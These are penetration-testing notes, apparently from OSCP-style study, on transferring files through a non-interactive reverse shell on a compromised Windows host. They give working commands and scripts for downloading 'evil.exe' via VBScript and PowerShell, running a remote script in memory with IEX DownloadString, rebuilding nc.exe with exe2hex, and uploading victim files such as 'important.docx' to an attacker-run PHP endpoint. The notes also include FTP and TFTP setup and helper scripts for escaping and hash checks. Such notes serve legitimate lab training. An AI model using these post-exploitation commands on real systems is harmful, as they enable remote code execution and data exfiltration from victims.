File Transfers

The main problem is the non-interactive shell: anything that prompts for input (an interactive ftp session, a password prompt, PowerShell waiting on a console) hangs a netcat-style reverse shell, so every method below is either scripted from a file or a single command line.

  1. Set up pure-ftpd on Kali. This script creates a locked-down system account, a virtual FTP user "offsec" mapped onto it (pure-pw prompts for the password; the client script below uses "lab") and the directory the files are served from:
#!/bin/bash

sudo apt install -y pure-ftpd
sudo groupadd ftpgroup
# system account that owns the FTP tree: no home, no login shell
sudo useradd -g ftpgroup -d /dev/null -s /usr/sbin/nologin ftpuser
# virtual FTP user "offsec" backed by ftpuser (prompts for the password)
sudo pure-pw useradd offsec -u ftpuser -d /ftphome
sudo pure-pw mkdb
sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/60pdb
# files to serve (e.g. rdp.bat) go in /ftphome
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd
  1. On Windows, feed ftp.exe a command file so no interactive session is needed (the password is the one given to pure-pw above):
# create ftp.txt while in the reverse shell on Windows
# keep a space before ">" on the first line: cmd.exe treats a digit immediately
# before ">" as a file handle, so "21> ftp.txt" would write "open 192.168.119.234 2"
echo open 192.168.119.234 21 > ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET rdp.bat>> ftp.txt
echo bye>> ftp.txt

# ftp execution: -v suppresses server responses, -n disables auto-login, -s: reads the commands from the file
ftp -v -n -s:ftp.txt
  1. HTTP downloader with VBScript for older versions of Windows (no PowerShell available). It writes the response byte by byte through a text stream, which can mangle bytes above 0x7F on some system code pages, so compare a hash of the file after the download:
# create wget.vbs while in the reverse shell on Windows:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# execute the download:
cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
  1. HTTP downloader for newer versions of Windows (PowerShell available):
# create wget.ps1 while in the reverse shell on Windows (the first line uses > so a stale wget.ps1 is overwritten rather than appended to):
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://10.11.0.4/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

# execute the download:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
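The ftp.txt, wget.vbs and wget.ps1 files above are all recreated on the target one echo line at a time, typed into a cmd.exe reverse shell. The script below is an added example (not part of the original notes) that generates those echo lines from any local file and handles the two cmd.exe pitfalls that bite when doing it by hand: a digit immediately before `>` being parsed as a file handle, and `& | < > ^` being operators that need a `^` escape outside double quotes. The function names and the constructed sample input are assumptions made for this example; the cmd.exe escaping rules themselves are standard behaviour.

```shell
#!/bin/sh
# Added example, not part of the original notes: build the "echo ... >> file"
# lines that recreate a local file on a Windows box through a non-interactive
# cmd.exe shell. cmd_escape/to_cmd_echo and the sample input are assumptions.
#
# Two cmd.exe pitfalls the hand-written lines above can hit:
#   * a digit right before ">" is taken as a file handle, so
#       echo open 10.11.0.4 21> ftp.txt
#     writes "open 10.11.0.4 2" (handle 1 = stdout got redirected). Putting the
#     redirection first (">>ftp.txt echo ...") sidesteps this and also avoids
#     a trailing space in the written line.
#   * & | < > ^ are operators outside double quotes and must be escaped with ^.
# "%" cannot be escaped this way in an interactive cmd.exe (variable expansion
# happens before anything else), so keep it out of the payload.

cr=$(printf '\r')

# Escape one line for cmd.exe echo: ^ & | < > get a ^ prefix, but only outside
# double quotes (inside quotes they are literal and an extra ^ would be echoed).
cmd_escape() {
    s=$1; out=''; inq=0
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}      # first character of s
        s=${s#?}             # remainder of s
        case $c in
            '"') inq=$((1 - inq)); out="$out$c" ;;
            '&'|'|'|'<'|'>'|'^')
                if [ "$inq" -eq 1 ]; then out="$out$c"; else out="$out^$c"; fi ;;
            *) out="$out$c" ;;
        esac
    done
    printf '%s' "$out"
}

# Read a file on stdin and print one cmd.exe line per input line that appends
# it to TARGET on the Windows side. The first line truncates (>) so a stale
# copy of TARGET is not appended to; empty input lines become "echo.".
to_cmd_echo() {
    target=$1; redir='>'
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%"$cr"}   # tolerate CRLF input
        if [ -z "$line" ]; then
            printf '%s%s echo.\n' "$redir" "$target"
        else
            printf '%s%s echo %s\n' "$redir" "$target" "$(cmd_escape "$line")"
        fi
        redir='>>'
    done
}

# Constructed sample input: the ftp.txt command file from the section above.
SAMPLE_FTP_SCRIPT='open 192.168.119.234 21
user offsec
lab
bin
get rdp.bat
bye'

printf '%s\n' "$SAMPLE_FTP_SCRIPT" | to_cmd_echo ftp.txt
```

Run it on Kali as `to_cmd_echo wget.vbs < wget.vbs.src` (the VBScript saved locally as plain text) and paste the output into the Windows shell; the first emitted line is `>wget.vbs echo ...`, every later one `>>wget.vbs echo ...`.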
  1. HTTP download one-liner (the relative path is resolved against the working directory of the powershell.exe process):
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/evil.exe', 'new-exploit.exe')
  1. HTTP execute in memory (nothing is written to disk: the script is fetched as a string and handed to Invoke-Expression):
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
  1. On FreeBSD
fetch <url>
  1. exe2hex and PowerShell (copy-and-paste transfer when no network transfer is possible)
upx -9 nc.exe # compress the exe in place first so there is less text to paste
exe2hex -x nc.exe -p nc.cmd # convert nc.exe into a Windows script that rebuilds it; -p emits the PowerShell-based variant, -b the DEBUG.exe variant (32-bit only, files under 64 KB)
# paste the content of nc.cmd into the Windows shell and run it - this recreates nc.exe in the current directory
  1. Upload from Windows to Linux using a PHP upload script (simple multipart POST)

Create the script (WebClient.UploadFile sends the file in a form field named "file", which is what $_FILES['file'] reads; basename() stops a crafted filename from walking out of the upload directory):

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

Save it as:

/var/www/html/upload.php

Create the uploads folder (outside the web root, so uploaded files cannot be fetched or executed through the web server) and give it the right permissions:

sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Use it from PowerShell to upload the file:

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
  1. TFTP file transfer from Windows XP or Windows Server 2003 (the tftp client is installed by default there; on later versions it is an optional feature that is off by default)

Install the TFTP server (atftpd) on Kali:

sudo apt update && sudo apt install atftpd
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp

Transfer files from Windows to Kali (-i selects binary/octet mode; use get instead of put to pull a file from Kali):

tftp -i <your_ip> put <filename>
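Several of the methods above rebuild the file byte by byte (exe2hex, the VBScript downloader) or default to ASCII mode unless told otherwise (ftp, tftp), so a silently corrupted binary is a common failure. The script below is an added example, not part of the original notes, that checks a transfer by comparing a SHA-256 computed on Kali against the output of `certutil -hashfile` pasted back from the Windows side; the function names and the sample certutil output are constructed for this example, not captured from a target.

```shell
#!/bin/sh
# Added example, not part of the original notes: after any of the transfers
# above, compare a SHA-256 computed on Kali with the digest certutil prints on
# Windows. Function names and the sample output are assumptions for this example.

# SHA-256 of a local file as 64 lowercase hex digits.
local_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# The matching command to run in the Windows shell (certutil is present on
# Windows 7 and later, so this works where PowerShell may not be usable).
windows_hash_cmd() {
    printf 'certutil -hashfile %s SHA256\n' "$1"
}

# Reduce pasted certutil output to the bare digest. Older certutil prints the
# digest as space-separated byte pairs, newer versions as one run of lowercase
# hex; both wrap it in a header and a footer line, and text pasted out of
# cmd.exe usually carries CRLF line endings. Keep the first line that is
# exactly 64 hex digits once spaces, CRs and case are normalised.
normalize_certutil() {
    printf '%s\n' "$1" | tr -d ' \r' | tr '[:upper:]' '[:lower:]' \
        | grep -E '^[0-9a-f]{64}$' | head -n 1
}

# Exit status 0 when the digest pasted back from Windows matches the local file.
verify_transfer() {
    remote=$(normalize_certutil "$2")
    [ -n "$remote" ] && [ "$remote" = "$(local_sha256 "$1")" ]
}

# Constructed sample: old-style certutil output for a file containing just
# "hello\n" (NOT a real capture; the digest is the known SHA-256 of that input).
SAMPLE_CERTUTIL_OUTPUT='SHA256 hash of file evil.exe:
58 91 b5 b5 22 d5 df 08 6d 0f f0 b1 10 fb d9 d2 1b b4 fc 71 63 af 34 d0 82 86 a2 e8 46 f6 be 03
CertUtil: -hashfile command completed successfully.'

demo=$(mktemp)
printf 'hello\n' > "$demo"
windows_hash_cmd evil.exe
if verify_transfer "$demo" "$SAMPLE_CERTUTIL_OUTPUT"; then
    echo "transfer verified: $(local_sha256 "$demo")"
else
    echo "MISMATCH: re-transfer the file"
fi
rm -f "$demo"
```

In practice: run `local_sha256 nc.exe` on Kali before sending, run the printed certutil command on the target, paste its output into `verify_transfer nc.exe "<pasted output>"`, and redo the transfer in binary mode if it reports a mismatch.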